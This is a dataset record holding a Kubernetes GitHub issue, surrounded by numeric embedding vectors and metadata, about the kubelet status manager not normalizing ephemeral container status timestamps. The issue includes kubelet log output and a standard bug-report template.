-0.02172996662557125, -0.0032570643816143274, 0.0017824730603024364, 0.006210298277437687, 0.029167741537094116, -0.008701709099113941, 0.021049385890364647, -0.02216748334467411, 0.0025724328588694334, -0.007636276539415121, 0.0008380661602132022, 0.009925134479999542, 0.002069086767733097, -0.003469745861366391, 0.004253629129379988, -0.007397263310849667, 0.01637444645166397, -0.00607661297544837, -0.00810215063393116, -0.018019182607531548, -0.029783504083752632, -0.017403418198227882, -0.009009591303765774, -0.022426752373576164, 0.010937903076410294, -0.021454494446516037, -0.00681795971468091, -0.010151994414627552, 0.005173223093152046, 0.010856881737709045, 0.0029633615631610155, 0.009333677589893341, 0.01260694582015276, 0.016026053577661514, 0.007903647609055042, -0.026153741404414177, 0.000005799684004159644, 0.01620430126786232, 0.014867446385324001, -0.010743451304733753, -0.009090612642467022, 0.007919851690530777, -0.0021004825830459595, 0.019720634445548058, -0.011334908194839954, 0.0005549972993321717, -0.020385010167956352, 0.008094048127532005, 0.01711174100637436, 0.016884882003068924, 0.02651023678481579, -0.0005157525301910937, 0.003988283686339855, 0.007453978527337313, -0.005643147975206375, -0.033445678651332855, 0.030075183138251305, -0.019947493448853493, 0.006036101840436459, -0.0018564051715657115, 0.00797656737267971, -0.01871596649289131, -0.022945290431380272, -0.001248743967153132, -0.014616278931498528, -0.015580435283482075, 0.008936671540141106, 0.01665802113711834, -0.0019435032736510038, -0.005679607391357422, 0.016309628263115883, 0.0015191532438620925, 0.004549357574433088, -0.02219989150762558, 0.00007399541937047616, -0.0027648587711155415, 0.0009580792975611985, -0.0033785966224968433, 0.012282859534025192, -0.006708580534905195, 0.021600332111120224, 0.011148558929562569, -0.03594113886356354, 0.00013609080633614212, -0.00936608575284481, 0.005027384497225285, 0.00872601568698883, 0.013238913379609585, -0.007020513527095318, 0.013101177290081978, 0.0017328474204987288, 0.00008709811663720757, -0.011861547827720642, 0.026137536391615868, -0.011667096987366676, 0.001558651216328144, -0.002588636940345168, -0.0006248783320188522, -0.005165121052414179, 0.03213312849402428, -0.005027384497225285, 0.0056350454688072205, -0.002055920660495758, 0.03169561177492142, 0.021438289433717728, -0.007733502425253391, -0.012444903142750263, 0.017322396859526634, -0.01067053247243166, -0.004121968988329172, 0.035552237182855606, 0.018586333841085434, 0.00035244354512542486, 0.020741505548357964, 0.0037958575412631035, 0.012696069665253162, -0.014227376319468021, -0.007441825233399868, 0.020611871033906937 ]
null
null
null
null
null
null
null
null
null
[ "kubernetes", "kubernetes" ]
### What happened? `EphemeralContainerStatuses` is not normalized in `normalizeStatus()` in the status manager: https://github.com/kubernetes/kubernetes/blob/cade1dddd81eba338df85de7b5d17324a87243b5/pkg/kubelet/status/status_manager.go#L1026-L1043 This does not seem to cause any user facing problem because `EphemeralContainerStatuses` is sorted before passed to the status manager and timestamps are normalized at marshaling to create a patch: https://github.com/kubernetes/kubernetes/blob/cade1dddd81eba338df85de7b5d17324a87243b5/pkg/kubelet/kubelet_pods.go#L2336 https://github.com/kubernetes/kubernetes/blob/cade1dddd81eba338df85de7b5d17324a87243b5/pkg/kubelet/status/status_manager.go#L873 However, an unexpected behavior is caused internally because timestamps are not normalized. If the log verbosity is 3 or larger, the following messages are logged periodically in kubelet when an ephemeral container exists: ``` May 14 20:10:33 kind-control-plane kubelet[720]: I0514 20:10:33.437155 720 status_manager.go:230] "Syncing all statuses" May 14 20:10:33 kind-control-plane kubelet[720]: I0514 20:10:33.438512 720 status_manager.go:984] "Pod status is inconsistent with cached status for pod, a reconciliation should be triggered" pod="default/ephemeral-demo" statusDiff=< May 14 20:10:33 kind-control-plane kubelet[720]: &v1.PodStatus{ May 14 20:10:33 kind-control-plane kubelet[720]: ... // 8 identical fields May 14 20:10:33 kind-control-plane kubelet[720]: PodIPs: {{IP: "10.244.0.5"}}, May 14 20:10:33 kind-control-plane kubelet[720]: StartTime: s"2024-05-14 20:09:21 +0000 UTC", May 14 20:10:33 kind-control-plane kubelet[720]: - InitContainerStatuses: nil, May 14 20:10:33 kind-control-plane kubelet[720]: + InitContainerStatuses: []v1.ContainerStatus{}, May 14 20:10:33 kind-control-plane kubelet[720]: ContainerStatuses: {{Name: "ephemeral-demo", State: {Running: &{StartedAt: {Time: s"2024-05-14 20:09:23 +0000 UTC"}}}, Ready: true, Image: "registry.k8s.io/pause:3.1", ...}}, May 14 20:10:33 kind-control-plane kubelet[720]: QOSClass: "BestEffort", May 14 20:10:33 kind-control-plane kubelet[720]: EphemeralContainerStatuses: []v1.ContainerStatus{ May 14 20:10:33 kind-control-plane kubelet[720]: { May 14 20:10:33 kind-control-plane kubelet[720]: Name: "debugger-qk87g", May 14 20:10:33 kind-control-plane kubelet[720]: State: v1.ContainerState{ May 14 20:10:33 kind-control-plane kubelet[720]: Waiting: nil, May 14 20:10:33 kind-control-plane kubelet[720]: - Running: &v1.ContainerStateRunning{StartedAt: v1.Time{Time: s"2024-05-14 20:09:35 +0000 UTC"}}, May 14 20:10:33 kind-control-plane kubelet[720]: + Running: &v1.ContainerStateRunning{StartedAt: v1.Time{Time: s"2024-05-14 20:09:35.697513091 +0000 UTC"}}, May 14 20:10:33 kind-control-plane kubelet[720]: Terminated: nil, May 14 20:10:33 kind-control-plane kubelet[720]: }, May 14 20:10:33 kind-control-plane kubelet[720]: LastTerminationState: {}, May 14 20:10:33 kind-control-plane kubelet[720]: Ready: false, May 14 20:10:33 kind-control-plane kubelet[720]: ... // 7 identical fields May 14 20:10:33 kind-control-plane kubelet[720]: }, May 14 20:10:33 kind-control-plane kubelet[720]: }, May 14 20:10:33 kind-control-plane kubelet[720]: Resize: "", May 14 20:10:33 kind-control-plane kubelet[720]: ResourceClaimStatuses: nil, May 14 20:10:33 kind-control-plane kubelet[720]: } May 14 20:10:33 kind-control-plane kubelet[720]: > ``` This message is emitted here: https://github.com/kubernetes/kubernetes/blob/cade1dddd81eba338df85de7b5d17324a87243b5/pkg/kubelet/status/status_manager.go#L984-L988 After `needsReconcile()` returns `true`, `syncPod()` is called. This does not look so harmful because `unchaged` gets `true` eventually: https://github.com/kubernetes/kubernetes/blob/cade1dddd81eba338df85de7b5d17324a87243b5/pkg/kubelet/status/status_manager.go#L873-L881 API is called once unnecessarily in `syncPod()`, though: https://github.com/kubernetes/kubernetes/blob/cade1dddd81eba338df85de7b5d17324a87243b5/pkg/kubelet/status/status_manager.go#L843 ### What did you expect to happen? It might be better to normalize ephemeral container statuses, at least timestamps, in the status manager to avoid this unexpected behavior. ### How can we reproduce it (as minimally and precisely as possible)? Set the log verbosity of kubelet to 3 or larger. Then, create an ephemeral container like [this](https://kubernetes.io/docs/tasks/debug/debug-application/debug-running-pod/#ephemeral-container-example). ### Anything else we need to know? _No response_ ### Kubernetes version <details> ```console $ kubectl version # paste output here Client Version: v1.29.4 Kustomize Version: v5.0.4-0.20230601165947-6ce0bf390ce3 Server Version: v1.29.2 ``` </details> ### Cloud provider <details> None </details> ### OS version <details> ```console # On Linux: $ cat /etc/os-release # paste output here $ uname -a # paste output here # On Windows: C:\> wmic os get Caption, Version, BuildNumber, OSArchitecture # paste output here ``` </details> ### Install tools <details> </details> ### Container runtime (CRI) and version (if applicable) <details> </details> ### Related plugins (CNI, CSI, ...) and versions (if applicable) <details> </details>
Status manager does not normalize ephemeral container statuses
https://api.github.com/repos/kubernetes/kubernetes/issues/124873/comments
6
2024-05-14T20:51:03
2024-05-16T06:45:49Z
https://github.com/kubernetes/kubernetes/issues/124873
2,296,394,943
124,873
false
This is a GitHub Issue repo:kubernetes owner:kubernetes Title : Status manager does not normalize ephemeral container statuses Issue date: --- start body --- ### What happened? `EphemeralContainerStatuses` is not normalized in `normalizeStatus()` in the status manager: https://github.com/kubernetes/kubernetes/blob/cade1dddd81eba338df85de7b5d17324a87243b5/pkg/kubelet/status/status_manager.go#L1026-L1043 This does not seem to cause any user facing problem because `EphemeralContainerStatuses` is sorted before passed to the status manager and timestamps are normalized at marshaling to create a patch: https://github.com/kubernetes/kubernetes/blob/cade1dddd81eba338df85de7b5d17324a87243b5/pkg/kubelet/kubelet_pods.go#L2336 https://github.com/kubernetes/kubernetes/blob/cade1dddd81eba338df85de7b5d17324a87243b5/pkg/kubelet/status/status_manager.go#L873 However, an unexpected behavior is caused internally because timestamps are not normalized. If the log verbosity is 3 or larger, the following messages are logged periodically in kubelet when an ephemeral container exists: ``` May 14 20:10:33 kind-control-plane kubelet[720]: I0514 20:10:33.437155 720 status_manager.go:230] "Syncing all statuses" May 14 20:10:33 kind-control-plane kubelet[720]: I0514 20:10:33.438512 720 status_manager.go:984] "Pod status is inconsistent with cached status for pod, a reconciliation should be triggered" pod="default/ephemeral-demo" statusDiff=< May 14 20:10:33 kind-control-plane kubelet[720]: &v1.PodStatus{ May 14 20:10:33 kind-control-plane kubelet[720]: ... // 8 identical fields May 14 20:10:33 kind-control-plane kubelet[720]: PodIPs: {{IP: "10.244.0.5"}}, May 14 20:10:33 kind-control-plane kubelet[720]: StartTime: s"2024-05-14 20:09:21 +0000 UTC", May 14 20:10:33 kind-control-plane kubelet[720]: - InitContainerStatuses: nil, May 14 20:10:33 kind-control-plane kubelet[720]: + InitContainerStatuses: []v1.ContainerStatus{}, May 14 20:10:33 kind-control-plane kubelet[720]: ContainerStatuses: {{Name: "ephemeral-demo", State: {Running: &{StartedAt: {Time: s"2024-05-14 20:09:23 +0000 UTC"}}}, Ready: true, Image: "registry.k8s.io/pause:3.1", ...}}, May 14 20:10:33 kind-control-plane kubelet[720]: QOSClass: "BestEffort", May 14 20:10:33 kind-control-plane kubelet[720]: EphemeralContainerStatuses: []v1.ContainerStatus{ May 14 20:10:33 kind-control-plane kubelet[720]: { May 14 20:10:33 kind-control-plane kubelet[720]: Name: "debugger-qk87g", May 14 20:10:33 kind-control-plane kubelet[720]: State: v1.ContainerState{ May 14 20:10:33 kind-control-plane kubelet[720]: Waiting: nil, May 14 20:10:33 kind-control-plane kubelet[720]: - Running: &v1.ContainerStateRunning{StartedAt: v1.Time{Time: s"2024-05-14 20:09:35 +0000 UTC"}}, May 14 20:10:33 kind-control-plane kubelet[720]: + Running: &v1.ContainerStateRunning{StartedAt: v1.Time{Time: s"2024-05-14 20:09:35.697513091 +0000 UTC"}}, May 14 20:10:33 kind-control-plane kubelet[720]: Terminated: nil, May 14 20:10:33 kind-control-plane kubelet[720]: }, May 14 20:10:33 kind-control-plane kubelet[720]: LastTerminationState: {}, May 14 20:10:33 kind-control-plane kubelet[720]: Ready: false, May 14 20:10:33 kind-control-plane kubelet[720]: ... // 7 identical fields May 14 20:10:33 kind-control-plane kubelet[720]: }, May 14 20:10:33 kind-control-plane kubelet[720]: }, May 14 20:10:33 kind-control-plane kubelet[720]: Resize: "", May 14 20:10:33 kind-control-plane kubelet[720]: ResourceClaimStatuses: nil, May 14 20:10:33 kind-control-plane kubelet[720]: } May 14 20:10:33 kind-control-plane kubelet[720]: > ``` This message is emitted here: https://github.com/kubernetes/kubernetes/blob/cade1dddd81eba338df85de7b5d17324a87243b5/pkg/kubelet/status/status_manager.go#L984-L988 After `needsReconcile()` returns `true`, `syncPod()` is called. This does not look so harmful because `unchaged` gets `true` eventually: https://github.com/kubernetes/kubernetes/blob/cade1dddd81eba338df85de7b5d17324a87243b5/pkg/kubelet/status/status_manager.go#L873-L881 API is called once unnecessarily in `syncPod()`, though: https://github.com/kubernetes/kubernetes/blob/cade1dddd81eba338df85de7b5d17324a87243b5/pkg/kubelet/status/status_manager.go#L843 ### What did you expect to happen? It might be better to normalize ephemeral container statuses, at least timestamps, in the status manager to avoid this unexpected behavior. ### How can we reproduce it (as minimally and precisely as possible)? Set the log verbosity of kubelet to 3 or larger. Then, create an ephemeral container like [this](https://kubernetes.io/docs/tasks/debug/debug-application/debug-running-pod/#ephemeral-container-example). ### Anything else we need to know? _No response_ ### Kubernetes version <details> ```console $ kubectl version # paste output here Client Version: v1.29.4 Kustomize Version: v5.0.4-0.20230601165947-6ce0bf390ce3 Server Version: v1.29.2 ``` </details> ### Cloud provider <details> None </details> ### OS version <details> ```console # On Linux: $ cat /etc/os-release # paste output here $ uname -a # paste output here # On Windows: C:\> wmic os get Caption, Version, BuildNumber, OSArchitecture # paste output here ``` </details> ### Install tools <details> </details> ### Container runtime (CRI) and version (if applicable) <details> </details> ### Related plugins (CNI, CSI, ...) and versions (if applicable) <details> </details> --- end body ---
6,065
[ -0.015780439600348473, -0.0025035887956619263, -0.009669032879173756, -0.0023289199452847242, 0.007038959767669439, -0.05425580218434334, -0.0157402865588665, 0.013058013282716274, -0.02566630393266678, -0.02293584495782852, 0.014246565289795399, 0.0020488472655415535, 0.0001619954564375803, -0.011989922262728214, 0.008673219010233879, 0.014158226549625397, -0.020205387845635414, 0.02712790109217167, -0.008608972653746605, -0.014792656525969505, -0.029424699023365974, 0.0051477160304784775, -0.011668691411614418, 0.05030466988682747, 0.0362347811460495, 0.009436140768229961, -0.011652630753815174, -0.000597287667915225, -0.024895351380109787, 0.009235371835529804, -0.007227682508528233, 0.014704318717122078, 0.025826917961239815, 0.025393256917595863, 0.047092366963624954, 0.010327555239200592, 0.03973619267344475, 0.039318591356277466, 0.019627172499895096, -0.029071345925331116, -0.05094712972640991, -0.027288516983389854, -0.002601965796202421, 0.04018591344356537, -0.04002529755234718, 0.009339772164821625, -0.03466075286269188, -0.009781464003026485, -0.027963100001215935, -0.012254937551915646, -0.014752502553164959, -0.04914823919534683, 0.0004916329635307193, -0.024365320801734924, 0.009661002084612846, -0.04564683139324188, 0.03575293719768524, -0.009243402630090714, 0.014607949182391167, 0.011098507791757584, 0.010423923842608929, 0.007444513030350208, -0.036973610520362854, 0.029440760612487793, 0.05290663614869118, 0.009990263730287552, -0.009219310246407986, 0.030773865059018135, -0.032926108688116074, -0.00944417156279087, -0.026742424815893173, -0.0027967116329818964, 0.026148149743676186, 0.008424265310168266, 0.07793048024177551, -0.04500436782836914, 0.03209090977907181, 0.045518338680267334, -0.02068723365664482, -0.03215515613555908, -0.022421877831220627, 0.03318309411406517, 0.0026802655775099993, 0.0063844528049230576, 0.024718673899769783, -0.02296796813607216, -0.003931056242436171, -0.05274602025747299, 0.015402994118630886, -0.0020137126557528973, -0.04779907315969467, -0.005954807158559561, 0.0033407954033464193, -0.040442898869514465, 0.015073733404278755, 0.04429766163229942, -0.02769005484879017, 0.032347895205020905, -0.05470552667975426, -0.032926108688116074, -0.03095054253935814, -0.004031440708786249, -0.004902777727693319, 0.008930203504860401, 0.04535772278904915, -0.013427427969872952, 0.024140458554029465, -0.006697652395814657, 0.027963100001215935, 0.14288325607776642, 0.023208891972899437, 0.017490992322564125, -0.061130132526159286, -0.015900900587439537, -0.013917304575443268, 0.0034331490751355886, 0.009636909700930119, 0.018278006464242935, -0.012423583306372166, 0.039768315851688385, -0.00009743568807607517, -0.00455745542421937, -0.0010640755062922835, -0.006745837163180113, -0.030067158862948418, 0.01731431484222412, 0.02855737693607807, 0.012568136677145958, -0.015274502336978912, -0.01378881186246872, -0.01266450621187687, -0.0007488682167604566, -0.03678087145090103, 0.0006223837845027447, -0.006344298832118511, -0.011403677053749561, 0.027995223179459572, 0.05178232863545418, -0.029119528830051422, 0.009259464219212532, -0.03308672457933426, -0.05881727486848831, 0.034371644258499146, -0.001455574994906783, -0.022582491859793663, -0.006597267929464579, 0.030018974095582962, 0.02012507990002632, -0.0210566483438015, -0.02139393985271454, -0.02372286096215248, -0.052135683596134186, 0.03466075286269188, 0.022084584459662437, 0.0326048769056797, -0.030436573550105095, -0.0011995944660156965, 0.007147375028580427, -0.02173123136162758, 0.009869801811873913, 0.012118414044380188, -0.017731914296746254, -0.014439303427934647, -0.04275575652718544, 0.030018974095582962, 0.013226659037172794, -0.004163948353379965, 0.02476685866713524, -0.0055974386632442474, 0.027095777913928032, 0.006292099133133888, 0.0005762068904004991, 0.016342593356966972, -0.01832619123160839, -0.036620259284973145, -0.00015183152572717518, 0.02115301787853241, 0.04940522462129593, -0.01204613782465458, 0.012809059582650661, 0.006926529109477997, 0.024461690336465836, -0.02194003202021122, -0.015354810282588005, 0.032926108688116074, -0.01652730070054531, -0.005830330308526754, 0.012680567800998688, -0.01892046630382538, -0.022357631474733353, 0.026597872376441956, 0.012447675690054893, 0.028766175732016563, -0.03125571087002754, -0.028766175732016563, 0.030741741880774498, 0.004665870685130358, -0.03472499921917915, -0.024365320801734924, -0.030340204015374184, 0.002575865713879466, -0.018374374136328697, -0.030324144288897514, -0.03832278028130531, -0.0073682209476828575, 0.023000091314315796, -0.018502866849303246, 0.00636036042124033, 0.015427086502313614, -0.026581810787320137, -0.04243452847003937, -0.05476977303624153, 0.03385767713189125, -0.0021241356153041124, 0.03344007581472397, 0.01186143048107624, -0.005111577454954386, 0.011540199629962444, -0.0157402865588665, -0.02173123136162758, 0.009187187068164349, -0.017587359994649887, 0.010022385977208614, -0.008906111121177673, 0.00022900209296494722, 0.01327484380453825, -0.006769929081201553, -0.02465442754328251, 0.005268177483230829, -0.01124306209385395, 0.02420470491051674, -0.007183513138443232, 0.021426063030958176, 0.00989389419555664, 0.0047783013433218, -0.00010383519838796929, 0.009853740222752094, 0.007625204976648092, -0.008769587613642216, -0.008705342188477516, 0.0013672366039827466, 0.020622987300157547, -0.03556019812822342, -0.013515765778720379, -0.029167713597416878, -0.009235371835529804, 0.010576508939266205, 0.03149663284420967, 0.03149663284420967, 0.04121385142207146, -0.008223496377468109, 0.002286758506670594, -0.001150406082160771, -0.002740496303886175, 0.00946023315191269, -0.000034569904528325424, -0.00944417156279087, -0.00008331911521963775, 0.011162754148244858, 0.02510415017604828, 0.05178232863545418, 0.019868096336722374, -0.021554555743932724, 0.024028029292821884, 0.00703092897310853, -0.03851551562547684, 0.0014194365357980132, 0.04991919547319412, 0.015635887160897255, -0.028830422088503838, 0.0320427268743515, -0.0052762082777917385, -0.024927474558353424, 0.005561300087720156, 0.00894626509398222, 0.003407049225643277, 0.016238193958997726, 0.009307648986577988, 0.025457503274083138, 0.029745928943157196, -0.0005892568733543158, -0.017057331278920174, -0.015250409953296185, 0.016254255548119545, -0.023112522438168526, 0.012953612953424454, 0.023658614605665207, -0.07009246200323105, -0.02846100740134716, -0.015218286775052547, -0.021875785663723946, -0.02272704616189003, 0.0032082879915833473, 0.02687091752886772, 0.0074083744548261166, 0.003473303047940135, 0.002684280974790454, 0.05332423374056816, -0.024252889677882195, -0.008930203504860401, -0.0056375921703875065, -0.014897056855261326, 0.023321321234107018, 0.030195651575922966, -0.0011895560892298818, 0.007825974375009537, -0.01158035360276699, 0.006982744205743074, -0.025987533852458, 0.024815043434500694, 0.014776594936847687, -0.034821368753910065, -0.007982573471963406, -0.04818455129861832, 0.013475612737238407, 0.00406557135283947, 0.017153698951005936, -0.012150537222623825, -0.01675216108560562, 0.0008437315700575709, 0.03305460140109062, -0.02712790109217167, -0.01405382715165615, 0.044618893414735794, 0.02057480253279209, -0.02903922274708748, -0.020622987300157547, -0.010994108393788338, -0.020783603191375732, -0.02340162917971611, -0.012873305939137936, -0.0048706550151109695, -0.012270999141037464, -0.020671172067523003, 0.0019886165391653776, -0.02619633451104164, -0.03941496089100838, -0.0022807354107499123, 0.0077296048402786255, -0.00004608275048667565, -0.024445628747344017, -0.033793430775403976, -0.00037368122139014304, -0.031769681721925735, 0.074718177318573, -0.011628538370132446, -0.005609484855085611, 0.02375498227775097, 0.04195268079638481, -0.006593252532184124, 0.0015027556801214814, -0.004041478969156742, -0.009580695070326328, 0.0054569002240896225, 0.03938283771276474, 0.005497054196894169, -0.016623670235276222, -0.0024272967129945755, 0.05656865984201431, -0.031014788895845413, 0.00495497789233923, -0.050561655312776566, -0.013563950546085835, 0.023208891972899437, 0.030115343630313873, 0.012423583306372166, -0.025007780641317368, -0.005244085099548101, -0.03239607810974121, -0.03462862968444824, 0.004541393835097551, 0.01124306209385395, -0.015242379158735275, 0.01970748044550419, -0.04343033954501152, -0.009982232935726643, 0.0048706550151109695, 0.034692876040935516, -0.022068524733185768, 0.02553781121969223, -0.024172581732273102, -0.003591756569221616, 0.02825220860540867, -0.005950791761279106, -0.007103205658495426, 0.033247340470552444, 0.01616591587662697, 0.06498489528894424, 0.027545500546693802, -0.005778130609542131, -0.025859041139483452, 0.036074165254831314, -0.05020830035209656, -0.027834609150886536, -0.0351104736328125, 0.012937551364302635, -0.033697061240673065, -0.01451158057898283, 0.021972155198454857, 0.029296206310391426, 0.02789885364472866, -0.010279370471835136, 0.015290563926100731, 0.003593764267861843, -0.0438479408621788, 0.01130730751901865, -0.04352670907974243, 0.013772750273346901, 0.007725589442998171, -0.012929520569741726, 0.00990995578467846, 0.014696287922561169, -0.034917738288640976, 0.017635544762015343, -0.008721403777599335, 0.02304827608168125, 0.010672877542674541, -0.0045293476432561874, -0.01220675278455019, -0.022887662053108215, -0.02947288379073143, -0.022004278376698494, 0.013106197118759155, 0.04738147556781769, 0.01765160635113716, 0.012005983851850033, 0.017587359994649887, 0.012760874815285206, 0.02622845582664013, 0.0030757803469896317, -0.019482620060443878, 0.01085758488625288, 0.010640754364430904, -0.01733037643134594, -0.004465101752430201, -0.0021361818071454763, -0.009693125262856483, -0.051011376082897186, 0.03038838878273964, -0.02226126194000244, -0.029745928943157196, 0.018197698518633842, 0.0014294750289991498, 0.014495518989861012, -0.053388480097055435, -0.007400343660265207, -0.05493038520216942, 0.009958140552043915, -0.04243452847003937, -0.004368732683360577, -0.03980043902993202, 0.02948894537985325, -0.0009677063790149987, 0.001306002028286457, 0.0007267836481332779, -0.03494986146688461, 0.004033448174595833, -0.04455464705824852, 0.02139393985271454, 0.026742424815893173, 0.016463054344058037, 0.0071433596312999725, -0.005268177483230829, 0.023674676194787025, 0.013628196902573109, -0.03989680856466293, 0.015973178669810295, -0.05425580218434334, 0.020847847685217857, 0.020735418424010277, 0.010086632333695889, 0.010215124115347862, 0.006966682616621256, 0.03472499921917915, -0.0013592058094218373, 0.017474930733442307, 0.007496712729334831, 0.000460764771560207, 0.01253601349890232, -0.012270999141037464, -0.013459551148116589, 0.0029733881819993258, -0.01007057074457407, 0.03880462422966957, -0.03443589061498642, -0.01300179772078991, 0.0033428031019866467, 0.006842206232249737, -0.024927474558353424, -0.017073392868041992, 0.021345755085349083, 0.001245771418325603, -0.02409227564930916, -0.011612476781010628, 0.035174719989299774, -0.010608632117509842, -0.0018771897302940488, -0.03258881717920303, 0.05852816626429558, 0.006830160040408373, -0.008231527172029018, -0.014599918387830257, 0.0025055964943021536, -0.04857002571225166, -0.007103205658495426, -0.026629993692040443, -0.011965829879045486, 0.030998727306723595, -0.02113695628941059, -0.045614708214998245, -0.024782920256257057, 0.00601503811776638, 0.010496200993657112, 0.009259464219212532, 0.017362499609589577, -0.014085950329899788, 0.0001766766799846664, 0.021169079467654228, 0.017121577635407448, 0.014013673178851604, -0.017940714955329895, -0.009395986795425415, 0.01937018893659115, 0.03327946364879608, -0.02296796813607216, -0.0028328499756753445, 0.03433952108025551, 0.0004251282662153244, -0.01847074367105961, -0.045518338680267334, -0.012696628458797932, 0.0035295183770358562, -0.010825462639331818, 0.03215515613555908, 0.006645452696830034, 0.010825462639331818, 0.002212473889812827, 0.012222814373672009, -0.01652730070054531, -0.000861800741404295, 0.01467219553887844, 0.0373590886592865, -0.02722427062690258, -0.015916962176561356, -0.022309446707367897, 0.024349259212613106, -0.011178815737366676, 0.030099282041192055, 0.024333197623491287, -0.0022024353966116905, 0.015419055707752705, -0.014013673178851604, 0.0011313330614939332, 0.03446801379323006, -0.03568869084119797, -0.03350432217121124, 0.015531486831605434, 0.04275575652718544, 0.007488681934773922, -0.030789926648139954, 0.0018500859150663018, 0.009323710575699806, 0.0210566483438015, -0.006159591488540173, -0.0024212736170738935, -0.017041269689798355, -0.0006565144867636263, 0.0007634239736944437, -0.003830671776086092, 0.014254596084356308, 0.030886296182870865, -0.023353444412350655, -0.019514743238687515, -0.022855538874864578, -0.00764929736033082, 0.041695695370435715, 0.003979240544140339, -0.014720380306243896, 0.0012236868496984243, -0.039222221821546555, 0.00034356588730588555, 0.03356856852769852, -0.049340978264808655, 0.01265647541731596, -0.01371653564274311, -0.011957799084484577, 0.015659978613257408, -0.01159641519188881, -0.012993766926229, -0.005689792335033417, 0.0376160703599453, 0.009355833753943443, 0.025505688041448593, 0.004894747398793697, 0.017266130074858665, 0.001438509556464851, -0.010279370471835136, 0.007312005385756493, 0.04069988429546356, 0.013363181613385677, -0.0066093141213059425, 0.015081764198839664, -0.0016021362971514463, -0.009877832606434822, -0.014254596084356308, 0.016061516478657722, -0.01766766794025898, 0.02801128476858139, -0.005139685235917568, -0.00945220235735178, 0.012744813226163387, -0.008536696434020996, 0.0393507145345211, -0.0066093141213059425, 0.02484716661274433, 0.03562444448471069, 0.03813004121184349, -0.0037664256524294615, 0.03748758137226105, -0.0015900901053100824, 0.014792656525969505, -0.026581810787320137, 0.02023751102387905, -0.00017366514657624066, 0.012792997993528843, 0.008335927501320839, 0.014262626878917217, -0.02327313832938671, -0.007247759494930506, 0.014110042713582516, -0.014615979976952076, 0.009227341040968895, -0.00494694709777832, -0.025168396532535553, -0.027497315779328346, 0.01697702333331108, 0.006741821765899658, -0.054287925362586975, -0.03305460140109062, -0.014479457400739193, 0.005858438089489937, -0.00945220235735178, -0.008882018737494946, 0.03687724098563194, -0.021666985005140305, -0.011066384613513947, 0.016944900155067444, 0.012423583306372166, 0.029119528830051422, 0.008408203721046448, -0.009163095615804195, -0.013845027424395084, -0.0015097825089469552, 0.04767058044672012, 0.012865275144577026, -0.005280223675072193, 0.024124398827552795, 0.03466075286269188, -0.009347802959382534, -0.006235884036868811, -0.027593685314059258, -0.024798981845378876, 0.018261944875121117, -0.018711667507886887, -0.0041679637506604195, -0.012078260071575642, -0.009636909700930119, -0.00796249695122242, -0.013981550000607967, 0.050850760191679, -0.012182660400867462, -0.015708163380622864, 0.02102452516555786, 0.006151560693979263, -0.018711667507886887, 0.00728389760479331, -0.01210235245525837, -0.003272534115239978, 0.003830671776086092, 0.0096208481118083, -0.02733670175075531, -0.005464931018650532, 0.004842547234147787, 0.01766766794025898, 0.013845027424395084, 0.012230845168232918, 0.023819228634238243, -0.007055021356791258, 0.0032805646769702435, 0.005882530473172665, -0.0006289087468758225, -0.007556943688541651, 0.0192416962236166, -0.01843862049281597, 0.0353674590587616, -0.011508076451718807, -0.004846562631428242, -0.014085950329899788, -0.00894626509398222, -0.02308039925992489, 0.013636227697134018, 0.019627172499895096, -0.005693807732313871, 0.042691510170698166, 0.002933234442025423, 0.0017155706882476807, 0.010841523297131062, -0.02060692571103573, 0.006247929763048887, 0.01900077424943447, -0.0040254173800349236, -0.02139393985271454, -0.0076854354701936245, 0.023208891972899437, -0.015146010555326939, 0.004175994545221329, -0.02722427062690258, 0.00156700168736279, -0.024461690336465836, -0.0074525438249111176, 0.012993766926229, 0.009524479508399963, -0.014254596084356308, -0.017025208100676537, -0.009363864548504353, 0.01440718024969101, 0.002533704275265336, -0.0011584368767216802, -0.023433752357959747, 0.019948404282331467, 0.009211279451847076, -0.022437939420342445, 0.02327313832938671, 0.02014114148914814, -0.018053144216537476, 0.011082446202635765, 0.018069205805659294, 0.019081082195043564, 0.019868096336722374, 0.015386932529509068, 0.0012628367403522134, -0.015844685956835747, 0.02104058675467968, -0.006304145324975252, -0.0010520293144509196, 0.00045599648728966713, 0.02169910818338394, -0.002170312451198697, -0.012849213555455208, -0.01193370670080185, 0.006111407186836004, 0.01822982169687748, -0.03947920724749565, -0.007673389744013548, 0.00449722446501255, -0.003491372102871537, 0.012166598811745644, -0.03114328160881996, 0.01778009906411171, 0.02587510272860527, 0.011548230424523354, -0.018374374136328697, 0.005228023510426283, 0.011026231572031975, 0.028332514688372612, 0.007829989306628704, -0.0031199497170746326, -0.009717217646539211, -0.010110724717378616, -0.009476294741034508, -0.022470062598586082, 0.0021482277661561966, -0.015844685956835747, -0.007231697905808687, 0.01423050370067358, -0.026629993692040443, -0.030998727306723595, -0.016687916591763496, -0.004453055560588837, 0.03172149509191513, -0.011227000504732132, -0.02259855344891548, -0.040442898869514465, -0.012327213771641254, 0.010785308666527271, -0.003495387500151992, 0.007159421220421791, 0.020205387845635414, 0.0007423431961797178, 0.02937651425600052, -0.02868586778640747, -0.026581810787320137, 0.04805605858564377, -0.011612476781010628, 0.020301757380366325, -0.02316070720553398, -0.009644940495491028, 0.0031219571828842163, 0.00742845144122839, -0.012471768073737621, -0.0198038499802351, 0.0008934218785725534, -0.007163436617702246, 0.006998805794864893, -0.036074165254831314, -0.03456438332796097, -0.022421877831220627, -0.016254255548119545, 0.006179668474942446, 0.03141632676124573, -0.01546724047511816, 0.023224953562021255, 0.006408545188605785, 0.007970527745783329, 0.0033668954856693745, -0.020542679354548454, 0.012913458980619907, 0.012584198266267776, -0.004151902161538601, 0.016053486615419388, -0.01845468208193779, 0.0036620257887989283, 0.004077617544680834, -0.0017165745375677943, -0.00274451170116663, -0.02767399325966835, 0.013531827367842197, 0.020109018310904503, 0.035495951771736145, -0.0030637343879789114, -0.019048959016799927, -0.0026742424815893173, -0.0009857756085693836, -0.01282512117177248, -0.03613841161131859, -0.004878685809671879, 0.01867954432964325, -0.021120894700288773, -0.004264332819730043, 0.03184998780488968, -0.0038387025706470013, -0.023883474990725517, -0.025248704478144646, -0.007560959085822105, 0.024333197623491287, -0.0029372498393058777, -0.07439694553613663, 0.0009084795601665974, -0.00882580317556858, -0.016286378726363182, 0.005043316166847944, -0.0064808218739926815, 0.020896032452583313, 0.0041117481887340546, 0.01186143048107624, -0.011010169982910156, 0.02765793167054653, 0.02611602656543255, 0.005509100388735533, 0.0109619852155447, 0.009267495013773441, 0.01457582600414753, 0.012776936404407024, -0.014664164744317532, 0.02857343852519989, 0.038065794855356216, -0.004220163449645042, 